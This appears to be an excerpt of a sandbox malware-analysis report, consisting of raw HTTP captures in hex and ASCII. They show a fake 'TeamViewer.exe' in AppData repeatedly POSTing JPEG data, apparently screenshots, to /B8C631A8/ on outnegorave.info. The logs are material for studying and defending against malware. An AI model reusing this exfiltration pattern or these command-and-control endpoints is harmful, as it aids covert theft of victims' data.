                                                                                                                                    2021-09-15 11:52:19 UTC1469OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:19 UTC1485OUTData Raw: 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29 68 00 a5 a4 a5 a0 05 a5 a6 d3 a8 13 0a 51 49 4b 40 85 a2 92 96 81 05 2d 14 53 00 a5 14 52 8a 04 c5 a0 52 52 8a 04 68 69 23 f7 ee 7d 10 d5 63 d4 fd 6a d6 93 fe ba 4f f7 4d 55 3d 4f d6 b2 5f 1b 09 fc 28 28 a2 8a d0 c8 29 69 29 68 10
                                                                                                                                    Data Ascii: J(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))hQIK@-SRRRhi#}cjOMU=O_(()i)h
                                                                                                                                    2021-09-15 11:52:19 UTC1501OUTData Raw: a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2 54 36 5a 42 93 49 49 46 69 31 d8 43 45 06 9b 52 52 0c d1 49 49 4a e3 b1 43 1d e9 69 28 ae 53 ac 5a 28 a3 14 00 51 45 14 08 5a 28 a4 a0 02 8a 28 a0 02 96 92 96 80 0a 28 a2 81 05 14 51 4c 02 8a 28 a0 02 96 8a 28 00 a2 8a 28 00 a2 8a
                                                                                                                                    Data Ascii: 4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4T6ZBIIFi1CERRIIJCi(SZ(QEZ(((QL(((
                                                                                                                                    2021-09-15 11:52:19 UTC1517OUTData Raw: bf 0e 7d ab a0 f0 8f 81 b4 33 6b 1d f5 cc bf da 32 1e a8 cb b5 23 6e ea 53 ae 47 70 df 95 20 3c ae 68 a4 82 56 8a 78 de 39 10 e1 91 d4 82 0f b8 34 ca e8 fe 21 22 47 e3 5b f4 8d 55 11 44 40 2a 8c 00 3c a4 ae 72 a8 41 56 f4 db 26 be ba 11 83 b5 07 2e de 82 aa 57 41 e1 7d b8 b9 07 af cb f9 73 53 27 65 a1 15 2a 2a 6b 9d ab d8 dc b3 d1 ad c2 6c b6 b3 12 6d 1c 92 9b 8f e3 55 f5 0f 0e 0b 85 61 1d ab 43 30 e8 55 08 fc c5 6e 8d ff 00 d9 b6 e2 2c 98 c6 77 e3 fb f9 ef f8 62 b6 f4 df 37 ec 29 e7 e7 76 4e dd dd 76 f6 fe b5 86 26 94 a8 61 d6 21 4b 5e c7 a3 0c 75 3a d3 f6 51 87 ba 78 b4 d1 3c 13 3c 52 a9 57 42 55 81 ec 69 95 b5 e3 1f 2f fe 12 8b df 2b 18 dc b9 c7 ae d1 9f d6 b1 6b 6a 72 e7 82 97 74 71 49 59 b4 14 51 4b 56 20 a4 a5 a2 80 12 8a 28 a0 02 8a 28 a0 02 8a 28
                                                                                                                                    Data Ascii: }3k2#nSGp <hVx94!"G[UD@*<rAV&.WA}sS'e**klmUaC0Un,wb7)vNv&a!K^u:Qx<<RWBUi/+kjrtqIYQKV (((
                                                                                                                                    2021-09-15 11:52:19 UTC1520OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 35 38 37 38 35 35 30 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2185878550--
                                                                                                                                    2021-09-15 11:52:20 UTC1520INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:20 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=dbab5448a34e17af3945c5fa39556548aa585b306410e4e3fffcaa940fc1a1ca; expires=Thu, 15-Sep-2022 11:52:19 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=n3%2BfaHl0dgvj%2BJni2MxmRioC26i%2FwyHTt1Wi%2B8jCkpjX8OC9cU1DRBGbTv4COjKJwMT8cYVARPpGBqtjkPLrj5mbRCmtjBszjPrAI0qH6ewfRSpPCs632HmOZLwg8yDRIH38"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5f40e2d6949-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:20 UTC1521INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    18192.168.2.549809172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:21 UTC1521OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84985
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3572611147
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:21 UTC1521OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 32 36 31 31 31 34 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3572611147Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:21 UTC1521OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 76 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^v;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:21 UTC1521OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:21 UTC1537OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:21 UTC1553OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:21 UTC1569OUTData Raw: 94 53 13 16 8a 28 a0 40 29 69 05 3a 98 84 a7 52 51 4c 18 ea 5a 68 a5 a6 48 ec d2 8a 6d 28 a6 84 c7 0a 5a 6d 38 53 25 85 2d 25 14 c4 2d 14 94 b4 00 52 d2 52 d0 02 d2 d3 69 d4 09 85 28 a4 a5 a0 42 d1 49 4b 40 82 96 8a 29 80 52 8a 29 45 02 62 d0 29 29 45 02 34 34 91 fb f7 3e 88 6a b1 ea 7e b5 6b 49 ff 00 5d 27 fb a6 aa 9e a7 eb 59 2f 8d 84 fe 14 14 51 45 68 64 14 b4 94 b4 08 5a 29 29 69 09 8b 45 14 50 01 4a 28 a2 90 85 a2 8a 29 08 5a 51 49 40 a0 43 a9 57 ad 36 96 93 04 5b 88 d6 be 98 df be 5a c5 89 b8 ad 7d 30 fe f9 7e b5 c7 5d 7b ac f5 30 6f de 44 be 2e 3f e8 48 3d eb 8c b5 ff 00 90 84 3f f5 d1 7f 9d 76 3e 2f ff 00 8f 58 fe b5 c6 da 7f c8 42 0f fa e8 bf ce 9e 13 fd dc db 13 fe f0 76 7a ef fc 7d 2f fb b5 97 8a d4 d7 7f e3 ed 7f dd ac ba 8a 1f 02 23 13 fc 46
                                                                                                                                    Data Ascii: S(@)i:RQLZhHm(Zm8S%-%-RRi(BIK@)R)Eb))E44>j~kI]'Y/QEhdZ))iEPJ()ZQI@CW6[Z}0~]{0oD.?H=?v>/XBvz}/#F
                                                                                                                                    2021-09-15 11:52:21 UTC1585OUTData Raw: 31 6a 69 7a 88 bd 34 b5 4b 99 4a 04 a5 e9 85 ea 32 d4 c2 d5 0e 45 a8 12 17 f7 a6 16 a6 16 a6 16 a8 72 34 51 1e 5a 98 5a 9a 5a 98 5a b3 72 34 51 1c 4d 30 9a 42 69 2a 1b 2d 21 49 a4 a4 a3 34 98 ec 21 a2 83 4d a9 29 06 68 a4 a4 a5 71 d8 a1 8e f4 b4 94 57 29 d6 2d 14 51 8a 00 28 a2 8a 04 2d 14 52 50 01 45 14 50 01 4b 49 4b 40 05 14 51 40 82 8a 28 a6 01 45 14 50 01 4b 45 14 00 51 45 14 00 51 45 14 00 51 45 14 00 a2 8a 05 2d 31 09 45 2d 14 00 51 45 14 08 28 a2 8a 60 14 b4 51 40 05 14 51 40 05 2d 14 50 02 51 4b 45 30 0a 28 a2 80 0a 28 cd 26 69 0a c2 d1 49 9a 33 40 ec 2d 2d 36 8a 62 b0 ea 33 4d a5 a0 05 cd 25 14 50 02 d1 9a 4a 28 01 68 a2 92 80 16 8a 28 a0 42 d1 49 4b 4c 05 a2 92 96 80 0a 33 45 14 08 5a 28 a4 a6 03 a8 cd 25 14 c0 5a 29 28 a0 42 d1 49 45 00 2d 2d
                                                                                                                                    Data Ascii: 1jiz4KJ2Er4QZZZZr4QM0Bi*-!I4!M)hqW)-Q(-RPEPKIK@Q@(EPKEQEQEQE-1E-QE(`Q@Q@-PQKE0((&iI3@--6b3M%PJ(h(BIKL3EZ(%Z)(BIE--
                                                                                                                                    2021-09-15 11:52:21 UTC1601OUTData Raw: e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d b2 6b eb a1 18 3b 50 72 ed e8 2a a5 74 1e 17 db 8b 90 7a fc bf 97 35 32 76 5a 11 52 a2 a6 b9 da bd 8d cb 3d 1a dc 26 cb 6b 31 26 d1 c9 29 b8 fe 35 5f 50 f0 e0 b8 56 11 da b4 33 0e 85 50 8f cc 56 e8 df fd 9b 6e 22 c9 8c 67 7e 3f bf 9e ff 00 86 2b 6f 4d f3 7e c2 9e 7e 77 64 ed dd d7 6f 6f eb 58 62 69 4a 86 1d 62 14 b5 ec 7a 30 c7 53 ad 3f 65 18 7b a7 8b 4d 13 c1 33 c5 2a 95 74 25 58 1e c6 99 5b 5e 31 f2 ff 00 e1 28 bd f2 b1 8d cb 9c 7a ed 19 fd 6b 16 b6 a7 2e 78 29 77
                                                                                                                                    Data Ascii: 7vT}?C6\!R6:wRH%hH L$~5HQDJ*oMk;Pr*tz52vZR=&k1&)5_PV3PVn"g~?+oM~~wdooXbiJbz0S?e{M3*t%X[^1(zk.x)w
                                                                                                                                    2021-09-15 11:52:21 UTC1604OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 35 37 32 36 31 31 31 34 37 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3572611147--
                                                                                                                                    2021-09-15 11:52:21 UTC1604INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:21 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=9b90ab7820aedb84401c3e4cabe8d1f4de976c24979407334ae140f0d89c29e7; expires=Thu, 15-Sep-2022 11:52:21 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=jv8R3YUoJQoPR1blz8rF%2B4rjyKr4SCDFqlvzXddyWzVFtPy4KuRZdNQivKkClAFuzEyb9I13j3R7mL53uWbamJ%2FF6TP0W7oISSENaqJ6Xunn7FydG9t2QnSIngyVkxg4PWRs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5fbed5f4e86-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:21 UTC1605INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    19192.168.2.549810172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:22 UTC1605OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84961
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------2639774921
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:22 UTC1605OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 36 33 39 37 37 34 39 32 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------2639774921Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:22 UTC1605OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 64 14 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^d;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:52:22 UTC1605OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:22 UTC1621OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:22 UTC1637OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
